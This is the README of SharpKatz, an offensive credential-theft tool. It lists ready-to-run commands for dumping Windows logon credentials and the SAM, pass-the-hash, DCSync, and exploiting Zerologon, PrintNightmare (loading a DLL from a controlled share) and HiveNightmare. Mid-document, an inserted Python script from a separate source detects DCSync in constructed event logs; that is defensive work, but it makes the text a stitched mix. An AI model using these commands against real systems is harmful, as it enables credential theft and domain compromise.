https://github.com/b4rtik/SharpKatz

Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
# SharpKatz
Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands

## Usage

### Ekeys

```SharpKatz.exe --Command ekeys```

List Kerberos encryption keys


### Msv

```SharpKatz.exe --Command msv```

Retrieve user credentials from the Msv provider


### Kerberos

```SharpKatz.exe --Command kerberos```

Retrieve user credentials from the Kerberos provider


### Tspkg

```SharpKatz.exe --Command tspkg```

Retrieve user credentials from the Tspkg provider


### Credman

```SharpKatz.exe --Command credman```

Retrieve user credentials from the Credman provider


### WDigest

```SharpKatz.exe --Command wdigest```

Retrieve user credentials from the WDigest provider


### Logonpasswords

```SharpKatz.exe --Command logonpasswords```

Retrieve user credentials from all providers


### List shadowcopies

```SharpKatz.exe --Command listshadows```

Enumerate shadow copies with NtOpenDirectoryObject and NtQueryDirectoryObject


### Lsadumpsam

```SharpKatz.exe --Command dumpsam --System \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM --Sam \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM```

Dump credentials from the provided SAM database


### Pth

```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash```

Perform pass-the-hash to create a process under the userdomain\username credential, using the NTLM hash of the user's password



```SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key```

Perform pass-the-hash to create a process under the userdomain\username credential, using the user's RC4 key



```SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash```

Replace the NTLM hash of an existing logon session



```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256```

Perform pass-the-hash to create a process under the userdomain\username credential, using the NTLM hash of the user's password and the AES256 key


### DCSync

```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc```

Dump a user's credentials by username



```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc```

Dump a user's credentials by GUID



```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc```

Export the entire dataset from AD to a file created in the current user's temp folder



```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```

Dump a user's credentials by username, using alternative credentials



```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```

Dump a user's credentials by GUID, using alternative credentials



```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```

Export the entire dataset from AD to a file created in the current user's temp folder, using alternative credentials
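Every dcsync variant above asks a domain controller to replicate directory data, which a DC with "Audit Directory Service Access" enabled records as Security event 4662 carrying the replication extended rights. The following defender-side check is an added example, not SharpKatz code: it parses constructed, flattened 4662 records (the `Key=Value;...` layout and the TESTLAB account names are assumptions) and flags replication rights exercised by any principal outside an allowlist of known replicators; the three right GUIDs are the well-known Active Directory extended-right GUIDs.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.
Added example, not SharpKatz code. The flattened 'Key=Value;...' record layout
and the sample events below are constructed for the demonstration."""
import re

# Extended rights needed for directory replication (well-known AD schema GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

def parse_event(line):
    """Turn one flattened 'Key=Value;Key=Value' record into a dict."""
    return dict(p.split("=", 1) for p in line.split(";") if "=" in p)

def replication_rights(event):
    """Names of the replication rights present in the 4662 Properties field."""
    guids = GUID_RE.findall(event.get("Properties", ""))
    return sorted(REPLICATION_RIGHTS[g.lower()] for g in guids if g.lower() in REPLICATION_RIGHTS)

def find_dcsync(lines, allowlist):
    """Return (account, rights) for each 4662 where a principal outside the allowlist
    (domain controllers, a directory sync service account) exercised replication
    rights. Get-Changes-All is the right that exposes password material."""
    allowed = {a.upper() for a in allowlist}
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        account = f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}"
        rights = replication_rights(ev)
        if rights and account.upper() not in allowed:
            hits.append((account, rights))
    return hits

# Constructed samples: DC-to-DC replication, a user account pulling replication
# data (the dcsync pattern), a harmless 4662 on a user object, an unrelated event.
SAMPLE_EVENTS = [
    "EventID=4662;SubjectDomainName=TESTLAB;SubjectUserName=DC02$;ObjectType=domainDNS;AccessMask=0x100;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectDomainName=TESTLAB;SubjectUserName=jdoe;ObjectType=domainDNS;AccessMask=0x100;Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662;SubjectDomainName=TESTLAB;SubjectUserName=jdoe;ObjectType=user;AccessMask=0x10;Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4624;SubjectDomainName=TESTLAB;SubjectUserName=jdoe;LogonType=3",
]
KNOWN_REPLICATORS = ["TESTLAB\\DC01$", "TESTLAB\\DC02$"]

if __name__ == "__main__":
    for account, rights in find_dcsync(SAMPLE_EVENTS, KNOWN_REPLICATORS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

The allowlist has to be maintained: every DC machine account and any legitimate directory-sync account belongs in it, and anything else exercising Get-Changes-All warrants an immediate look.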


### Zerologon

There is no reference to logoncli.dll; the direct RPC call works even from a [non-domain-joined workstation](https://twitter.com/gentilkiwi/status/1306178689630076929).

```SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```

Perform Zerologon check



```SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```

Perform Zerologon attack



```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local```

Perform the Zerologon attack and dump a user's credentials by username



```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local```

Perform the Zerologon attack and dump a user's credentials by GUID



```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local```

Perform the Zerologon attack and export the entire dataset from AD to a file created in the current user's temp folder



Note: Do not use zerologon in a production environment, or at least plan for the recovery actions detailed [here](https://github.com/dirkjanm/CVE-2020-1472).

### PrintNightmare CVE-2021-1675 - CVE-2021-34527

```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll```

Perform the PrintNightmare attack



```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom```

Perform the PrintNightmare attack with the provided credentials


### HiveNightmare CVE-2021-36934

```SharpKatz.exe --Command hiveghtmare```

Exploit the HiveNightmare vulnerability, selecting the first available shadow copy


## Credits

This project depends entirely on the work of [Benjamin Delpy](https://twitter.com/gentilkiwi) and [Vincent Le Toux](https://twitter.com/mysmartlogon) on the [Mimikatz](https://github.com/gentilkiwi/mimikatz) and [MakeMeEnterpriseAdmin](https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1) projects.

The analysis of the code was conducted following the example from [this blog post](https://blog.xpnsec.com/exploring-mimikatz-part-1/) by [xpn](https://twitter.com/_xpn_).